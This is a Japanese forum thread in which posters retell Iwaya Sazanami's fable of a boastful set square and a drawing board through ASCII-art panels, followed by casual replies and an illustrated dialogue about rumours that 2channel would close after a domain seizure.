      / (_) ..|  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ オレ  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    /        |  | 世間に品も多いが、乃公ほど角のあるものわあるまい
   /  (*゚Д゚)    .| < 角にかけてわ乃公が一番だ!
 /|llll|llll|l∪l|l∪l|llll|llll|   \_______________________
  ̄ ̄ ̄ |  ̄ | ̄ ̄~
       ∪'∪
と、たった三つよりない角を、酷く鼻にかけておりました。

194 :( ´∀`)さん:2006/12/24(日) 20:29:09 ID:tjlSRoRH0
4/18


 すると或る日、同じ机の上にあった鉛筆が来ていうにわ、

            /|
          /  |
         /   |           ▲
       /_   |          /  \
      / (_) ..|            |::|::::|::::|::|
    /        |        (´Д` )::|
   /  (,,゚Д゚)     |        と|::|::::|::::|::つ
 /|llll|llll|l∪l|l∪l|llll|llll|         |;;|;;;;|;;;;|;;|
  ̄ ̄ ̄ と__) )  ̄ ̄          (_)`J
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                      /|
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 三角さん三角さん、お前わ平常から大層その角を自慢しているし、
| わしらもまたお前ほど角の多いものわないと思っていたが、
| この間来た画板を見たかイ。あれわお前よりまた角が多いぜ。
\___________________________

                                          と、いいますから、


195 :( ´∀`)さん:2006/12/24(日) 20:29:57 ID:tjlSRoRH0
5/18


三角わ少し不平の顔色で、

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ナニ僕より角の多い奴がおる。馬鹿いい給うな。
| 凡そ世界わ広しといえども、僕より余計に角を持た奴わないはずだ。

   ̄ ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            /|
          /  |
         /   |           ▲
       /_   |          /  \
      / (_) ..|            |::|::::|::::|::|   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    /        |        (´Д`;):|  < ところがあるから仕方がない。
   /  (゚ε゚#) .  |      (( と|::|::::|::::|:つ )) \_____________
 /|llll|llll|l∪l|l∪l|llll|llll|         |;;|;;;;|;;;;|;;|
  ̄ ̄ ̄ と__) )  ̄ ̄         (_(__)
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

196 :( ´∀`)さん:2006/12/24(日) 20:30:38 ID:tjlSRoRH0
6/18


/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ドウ  ̄ ̄ ̄ ̄ ̄ ̄
| ナニそれわ君達の眼が如何かしてるのだ。

   ̄ ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            /|
          /  |
         /   |           ▲
       /_   |          /  \
      / (_) ..|            |::|::::|::::|::|   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    /        |        (´Д`#):|  < ナニ如何も仕てるものか、
   /  (# ゚Д)  ..|           (|::|::::|::::|::|)   | 嘘だと思うなら行て見給え!
 /|llll|llll|l∪l|l∪l|llll|llll|         |;;|;;;;|;;;;|;;|    \____________
  ̄ ̄ ̄ と__) )  ̄ ̄         (_(__)
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

197 :( ´∀`)さん:2006/12/24(日) 20:31:15 ID:tjlSRoRH0
7/18


/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| そんなら行て見よう。嘘だったら承知しないよ。

   ̄ ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
              /|
            /  |
           /   |
         /_   |      ▲
        / (_) ..|   ./  \
      /        |   |::|::::|::::|::|  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     /  (,,゚Д゚)    |   |:( ´Д`)< いいとも
   /|llll|llll|l∪l|l∪l|llll|llll|   (|::|::::|::::|::|)  |  嘘なら首でもやるワ。
    ̄ ̄ ̄ |  ̄ | ̄ ̄~    |;;|;;;;|;;;;|;;|   \_________
         (ノ'∪        し (__)
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

198 :( ´∀`)さん:2006/12/24(日) 20:31:47 ID:tjlSRoRH0
8/18


と、これから連れ立って行て見ますと、なるほど画板わ真ッ四角で、自分よりわ一角多く、
しかも今まで自分を褒めていた連中が、今でわみんな画板の方ばかり向いて、頻りにその角を褒めている様子です。

                     +      +       +
                +                       +
                 ._ _____
              +     || ̄ ̄ ̄ ̄ ̄||
                 ||       .||  __ スゴィョゥ
                 ||       .||   |llllllllll|       +
                +   ||_ ( ^Д^) _.|| _/;;;;;;;;;ヽ_
                   ⊂   ⊃  [;;(゚ω゚=);;;]   _  カド オーイ! カコイイ!!
                    |   |    と x  )〜 γ__ヽ
                     U U     UU    (・∀・*)
         /|
   …   /  |
      /   |
    /_   |      ▲ ホラ
   / (_) ..|   ./  \

199 :( ´∀`)さん:2006/12/24(日) 20:32:18 ID:tjlSRoRH0
9/18


              /|
            /  |
           /   |
         /_   |      ▲
        / (_) ..|   /  \
      /        |    |::|::::|::::|::|  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄                 \
     /  (;゚Д゚).   |   |:( ´Д`)< どうだイ嘘じゃあるまい。        ヨッツモ アルョゥ
   /|llll|llll|l∪l|l∪l|llll|llll|   (|::|::::|::::|::|)  \___________    デショー アハハハハ
    ̄ ̄ ̄ |  ̄ | ̄ ̄~    |;;|;;;;|;;;;|;;|                             スゴイ! イイ!!
         (ノ'∪       (__)_)                                    /
 ̄ ̄ ̄ ̄ /|  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
/ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|       コイツ
| なるほど此奴わ恐れ入た。
\____________

と、さすがの三角定木も、こうなると頭を掻くより他わありません。
大いに面目を失いましたが、しかし心の中でわ、まだ負惜しみという奴があって、

200 :( ´∀`)さん:2006/12/24(日) 20:32:52 ID:tjlSRoRH0
10/18



 ( おのれ生意気な画板め、余計な角を持て来やがって、
 (  よくも乃公に赤恥をかかせやがったな。どうするか覚えていろ
  `〜〜〜〜〜〜〜〜〜〜〜〜〜○〜〜〜〜〜〜〜〜〜〜〜〜
              /|    O
            /  |  o
           /   |        と、果てわ悔しまぎれに良くない了簡を起しました。

201 :( ´∀`)さん:2006/12/24(日) 20:33:26 ID:tjlSRoRH0
11/18


 で、そのまま帰ると、直ぐに近所の鋏の処え参り、

                  |\
                  |  \
                  |   \
                  |  _  \
                  | (_)   \
                  |        \     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  __             |  (゚Д゚,,).   \ < 鋏君、申兼たが今夜一ト晩、君の体を貸してくれまいか
 (⊂⊃ヽγ´二二二ヽ   |llll| とl| と lll|l|llll|lll \ \_______________________
 (⊂⊃フ( 'A`)二二フ    ̄ |  ̄ |  ̄ ̄ ̄
  ` ̄´ ノ( ヘヘ          ∪'ヽ)
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   /|
/ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| なるほど、次第によってわ貸すまいものでもないが、
| 一体何を切るのだ。
\___________ |\ _____________
       /
       | ちっと硬いものを切りたいのだが、よく切れるかイ。
  /|__ \____________   _________________
  |                         ムズ
  | 大抵なものなら切て見せるが、それでも六かしいと思うならまア一遍磨いで行くさ。
  \__________________________________

202 :( ´∀`)さん:2006/12/24(日) 20:33:59 ID:tjlSRoRH0
12/18


              |\
              |  \
              |   \
              |  _  \
              | (_)   \     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ?       |        \    | そうか、そんなら磨がしてくれたまえ。
  __         ,,  (゚∀゚*)   \ < 痛かろうけども頼まれたが因果だ、ちっとの間辛抱頼む
 (⊂⊃ヽγ´二二二◆⊂lll|ll つll|l|llll|lll\ \_______________________
 (⊂⊃フ( 'A)二二フ ̄ |  ̄ |  ̄ ̄ ̄
  ` ̄´ ノ( ヘヘ      U`U
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
と、これから三角定木わ、件んの鋏をば磨ぎ立てまして、もうこれならば大丈夫と、その日の暮れるのを、
今か今かと待ちかまえておりました。

203 :( ´∀`)さん:2006/12/24(日) 20:34:33 ID:tjlSRoRH0
13/18

                       アタリ
そのうちに日も暮れて、夜も更けて、四隣も寝静まったと思う頃、三角定木わムクムクと床を出て例の鋏をば小脇にかかえ、
さし足ぬき足で、彼の画板の寝ている処え、そっと忍んで参りました。
 見ると画板わ、前後も知らぬ高鼾で、さも心持快さそうに寝ておりますから、
              /|
            /  |
           /   |
         /_   |
        / (_) ..|
      /      _|__
     /  (*゚∀゚)=3(⊂⊃ヽγ´二二二ヽ
   /|llll|llll|l∪l|l つ (⊂⊃フ('A`)二二フ
    ̄ ̄ ̄ |  ̄ | ̄ ` ̄´ ノ(_ ヘヘ          ∩____
         (ノ'∪ モノアツカイ マンドクセ     ⊂ ̄ ̄.|| ( _Д_) zzZZZ…
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄  ||          || ̄ ̄
                                ||_____||
       O                          ̄ ̄ ̄ ̄ ̄ ̄
 ,〜〜〜 ○ 〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
(  〆めた! おのれ画板め、
 ) 今乃公が貴様の角を、残らず取り払ってやるからにわ、もう明日からわ角なしだ、
( いくら威張っても追い付かんぞ
 `〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜

と、腹の中で散々悪態を吐きながら、突然チョキリ!

204 :( ´∀`)さん:2006/12/24(日) 20:35:09 ID:tjlSRoRH0
14/18


一角切て落しましたが、 まだ気が付かない様子ですから、また一角をチョキリ!
それでも眼が醒めないから、
                      /|
                    /  |
                   /   |  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                 /_   |γ  こりゃよくよく寝坊だわイ…
                / (_) ..|  ̄\
              /      _|__    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
             /  (*゚Д゚)  (⊂⊃ヽγ´二二二ヽ
           /|llll|llll|l∪l|l つ (⊂⊃フ(A`)二二フ   ∩___
            ̄ ̄ ̄ (つと) ̄ ̄   ノ( ヘヘ  ⊂ ̄ と / ( _∀_) \ ムニャムニャ....
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ .||          || ̄ ̄
                                      ||_____||
                                     ̄ ̄ ̄ ̄ ̄ ̄
といいながら、
チョキリ! チョキリ! とうとう四角とも切り落し、

205 :( ´∀`)さん:2006/12/24(日) 20:36:33 ID:tjlSRoRH0
15/18



                    |\
                    |  \
                    |   \
                    |  _  \
                    | (_)   \      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                    |        \    | まずこれで溜飲が下がった。どりゃ帰って寝よう、
    __             |  (゚Д゚*∩  \ < 鋏さん大きに御苦労だった
   (⊂⊃ヽγ´二二二ヽ   |llll|とl|llll| ノ ll|llll|lll \ \_______________________
   (⊂⊃フ(A` )二二フ    ̄ |  ̄ | ̄ ̄ ̄ ̄
      ̄ ̄ ノ( )ヽ          |  0
< Zzzz....   ハ =3 =3       し'´
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

と、急いでわが家え帰って、そのまま寝てしまいました。

206 :( ´∀`)さん:2006/12/24(日) 20:38:08 ID:tjlSRoRH0
16/18



 さてその翌朝、何喰わぬ顔で床を出て見ますと、世間でわ大評判で、逢う者ごとに、

              /|       /|ヽ
            /  |        ( .・. )
           /   |       |;;;;|
         /_   |       |;;;;|
        / (_) ..|       |;;;;|
   ??? /       |       |;;;;|
     /  (,,゚Д゚)    |    ∩(゚ー゚*∩
   /|llll|llll|l∪l|l∪l|llll|llll|     ヽ   ノ
    ̄ ̄ ̄ |  ̄ | ̄ ̄~       |  |
         (ノ'∪          し`J
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
               /|
         / ̄ ̄ ̄   ̄ ̄ ̄ ̄\
         | 画板わえらいえらい  |
         \_  ______/ \
            |/        | (_)  \  !!!!!?
       __             |        \
      |llllllllll|              |  (゚Д゚;)   \
     _/;;;;;;;;;ヽ           |llll|llll|llll|llll|llll|llll|lll \
    [;;;(*゚ω゚);]           ̄ (|  ̄ |) ̄ ̄ ̄ ̄
     (  x )              |  |
      UU                し'`J
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  シキ                   ドウ
と、頻りに画板を褒め立てますから、如何した事かと行て見ますと、


207 :( ´∀`)さん:2006/12/24(日) 20:39:40 ID:tjlSRoRH0
17/18



こわいかに、昨日まで四角であった画板わ、今朝わ八角に成って、意気揚々と歩いております。

四角の角々を切り落せば、角の数が倍になって、八角に成るのわ当然、しかもそれわ自分の所業であるのに、
 そうとわ心付かぬ三角定木、驚いたの驚かないの!


              /|
            /  |     \   |   |   /
           /   |         _____
         /_   |   ─   / ̄ ̄ ̄ ̄ ̄\   ─
        / (_) ..|       ||           ||
    Σ /       |  ─    ||           ||    ─
     /  (l| Д )    .|        \_( ^Д^)_/
   /|llll|llll|l∪l|l∪l|llll|llll|    ─       (|   |)      ─
    ̄ ̄ ̄ |  ̄ | ̄ ̄~           |   |
         (ノ'∪         /     (ノ U     \
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        ゜
       O
 ,〜〜〜〜 ○ 〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
(        ドウ
 ) ヒヤーこりゃ如何じゃ。アノ四角め、一夜の中に八角に成りよった。
(   この分でわまた明日わ、十角や二十角にも成るだろう、こりゃ所詮叶わぬわイ。
 ヽ〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜

208 :ノスタルヂヤ ◆djUyVCCSh2 :2006/12/24(日) 20:40:22 ID:tjlSRoRH0
18/18


                                    タワケ
と、とうとう兜を脱いで降参しましたとわ、身のほど知らぬ大白痴。

                /|
              /  |      _____
             /   |     / ̄ ̄ ̄ ̄ ̄\
           /_   |     ||           ||
          / (_) ..|     ||           ||
        /        |     \_(Д^;)_/ イキナリ ドウシタンデスカ…
       /  (,,TДT)   |      (( と (( と)
     /|llll|llll|llll| .ヽll ヽl|llll|       /  /
      ̄ ̄ ̄と_U__U ̄        ∪ヽ)
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


                                                        〜 ヲ ハ リ 〜

209 :ノスタルヂヤ ◆djUyVCCSh2 :2006/12/24(日) 20:49:41 ID:tjlSRoRH0


   出典 : 巖谷小波 『三角と四角』  (明治二十七年發表)



明治二十七年の發表にもかゝはらず舊假名遣ひが無視されてゐますが、
作者・巖谷小波氏の「日本語の假名遣ひは煩雜過ぎる」といふ思ひが反映されてゐるやうです。
青空文庫によると、彼は伯林大學で日本語を教へた經驗があるさうです。
日本語の難しさを痛感してゐた作者だからこそ、
幼い子供逹向けの作品に難しい假名遣ひの作品を著すのには、躊躇ひがあつたのかもしれませんね。

210 :( ´∀`)さん:2006/12/24(日) 21:29:45 ID:d2jjT0sP0
GJ!

211 :( ´∀`)さん:2006/12/25(月) 01:34:24 ID:EJ/6Ep4V0
乙でございます。
小話にも使へさうな話ですね。堪能させて頂きました。

212 :( ´∀`)さん:2006/12/27(水) 21:20:44 ID:cToFMFmT0
>>209
Es ist sehr gut!

何となく獨逸語で

213 :( ´∀`)さん:2006/12/29(金) 01:40:21 ID:EcavmbdR0
早めに保全

214 :( ´∀`)さん:2006/12/31(日) 21:49:39 ID:/dXBfAuT0

│ もう大晦日とは、月日の經つのは早いものだな
└────y────────────────
                         ┃
.   ∧∧         /ノ人ヽ     .┃
   (,,゚Д゚)        (゚ー゚*)     ┃〇──‐
  <  y > ┌──┐ (/  |       ┃###
  ( /つ ) (::::::::::::::::) (  )⊃     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ┌─────────ヘ───────
 │ 来年も良い年であつて欲しいですわね

215 :( ´∀`)さん:2007/01/02(火) 13:08:21 ID:C+prbvXR0
あああああああああああああああああああああああああああああああああああああああああああ
あああああああああああああああああああああああああああああああああああ
あああああああああああああああああああああああああああああ
あああああああああああああああああああああああああああああああああああああああああああ

216 :( ´∀`)さん:2007/01/03(水) 03:49:51 ID:B4dDh4AJ0
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧ ∧   <ぬるぽ
 ___( °Д°)  \_____________
(_____ノ
 UU  UU

217 :( ´∀`)さん:2007/01/05(金) 21:23:24 ID:OonTapfr0
>>216殿
お下げ下さい。


218 :( ´∀`)さん:2007/01/06(土) 09:16:17 ID:InY0LurT0
スキャブゴースト

219 : ◆1IMMMMMMMM :2007/01/08(月) 11:01:03 ID:CxLyNU420
  ∧∧
  (,,゚ω゚) むゝむ。
  く i y u>
  /_/l_|┃
   .U O┃


220 :( ´∀`)さん:2007/01/09(火) 17:13:49 ID:WrA/X1Ft0
ちんこうんこまんこ

あああああああああああああああああああああああ

221 :( ´∀`)さん:2007/01/11(木) 19:31:51 ID:6Hmsj8nz0
早めの保全

222 :( ´∀`)さん:2007/01/11(木) 19:38:35 ID:WJkcIZ9O0

 近頃はネタが來ないので寂しいですね。

 ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                          ┃
   Λ_Λ      。   ΛΛ        ┃
  ( ´Д`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ____________Λ__________

    まあ急いても仕方が無い。マタアリと待つが吉ぢや。


223 :( ´∀`)さん:2007/01/12(金) 20:30:50 ID:PWUw8gmF0
皆さん、こゝが閉鎖されてしまつた場合、何處へ行けば良いのか、
待ち合はせ場所を豫め決めておきませんか

224 :( ´∀`)さん:2007/01/12(金) 21:17:10 ID:Wb8qtbKU0
聯合板ではどうでせう。

225 :223:2007/01/13(土) 01:54:40 ID:iS3rDe3J0
>>224殿
恐れ入りますが、具體的な ゆーあーるえる をお示し頂けないでせうか

226 :( ´∀`)さん:2007/01/13(土) 02:04:41 ID:KROqJqxG0
>>225
http://www.bell-tree.com/~chika/cgi-bin/a/index2.html

227 :( ´∀`)さん:2007/01/13(土) 21:25:32 ID:RSNAiNeD0
  ∧ ∧
  (,,゚Д゚) y━~  弐番局閉鎖騒動の真偽や如何に?
  / y~|⊃
〜(_|⊃)

228 :( ´∀`)さん:2007/01/14(日) 16:36:13 ID:67AlRmME0
http://d.hatena.ne.jp/textoyx4/mobile?date=20070112
↑こそが釣りの様にも思えますが

229 :1/9:2007/01/15(月) 20:34:13 ID:VNgGrGEJ0

 結局、貳番局の閉鎖騷動は何だつたんでせう   |
___  _________________/
     ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                 ∧
 / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 | そも/\の始まりは、貳番局がらみで起きた裁判で
 | 管理人であるひろゆき氏に損害賠償の判決が出されたことだな。

230 :2/9:2007/01/15(月) 20:35:41 ID:UftN3k+90

    | ところが、ひろゆき氏は賠償金を拂はない。
    | 業を煮やした債權者が、裁判所にひろゆき氏の
    | 財産差し押さへの申し立てをした。
    \_________  ___________
                   ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                  ∧
  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  | その財産の中に、貳番局のどめいん名である
  | 2ch.netが含まれてゐると電子網で報道されたことで
  | 貳番局閉鎖騷動につながつたわけだ

※該當記事 ttp://www.zakzak.co.jp/top/2007_01/t2007011201.html

231 :3/9:2007/01/15(月) 20:39:39 ID:INn+MAX20

 どめいん名を差し押さへるなんて . |
 できるんでせうか?            |
___  ___________/
     ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                  ∧
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      | 前例がないのは事實だな。
      | それに新たなどめいん名を取得することはできるし、
      | 貳番局閉鎖に繋がるとは考へにくい。

232 :4/9:2007/01/15(月) 20:40:10 ID:INn+MAX20

      | おまけに、實は貳番局のどめいん名は
      | ひろゆき氏の所有ではないのだな。
      \_______  ___________
                  ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧
 ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
 それは初耳です、誰が持つてゐるのですか?  |
                 ∧
 / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 | 貳番局に鯖を貸してゐる會社の社長が持つてゐるとかいふ話だ。
 | 何にしてもひろゆき氏の所有でないのは確からしい

233 :5/9:2007/01/15(月) 20:41:12 ID:INn+MAX20

 第三者が所有してゐるんぢや .|
 差し押さへは無理ですネエ   |
___  _________/
     ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                  ∧
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      | それに末尾がnetのどめいん名は
      | 米國法が適用されるらしい、
      | 日本の法律でどうにかするのは無理といふことだ

234 :6/9:2007/01/15(月) 20:41:55 ID:INn+MAX20

 では、貳番局が閉鎖することはないんですね? |
___  ________________/
     ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                  ∧
   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   | いや、差し押さへの申し立てが出てゐるのは事實だし
   | 概ね二週間前後で受理されて強制執行になるのは確かだらう。

235 :7/9:2007/01/15(月) 20:42:44 ID:INn+MAX20

 | ひろゆき氏が經濟的に貳番局を續けられなくなるか、
 | 面倒になつて閉鎖する可能性はあるやも知れぬ。
 | まあ、個人で運營してゐる以上、さういふ可能性は常にあるのだが
 \___________  ________________
                   ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧
 ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
心配するより、マタアリと今を樂しむのが良さゝうですね  |
                    ∧
            / ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄\
              |  マアさういふことだ    |

236 :8/9:2007/01/15(月) 20:43:35 ID:INn+MAX20

 納得したら急に腹が減つてきました |
 先生、何か食べに行きませんか   |
___  ____________/
     ∨
                           ┃
   ∧_∧      。    ∧ ∧        ┃
  ( ´∀`)       ||    (Д゚ ,,)        ┃〇──‐
  < ___lつと_> ┌──┐ < y  >     ┃###
  し|__)_)  (::::::::::::::::) ( /つ )      ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                   ∧
      / ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
        | まつたく、お前はいつも食ひ氣だな。  |

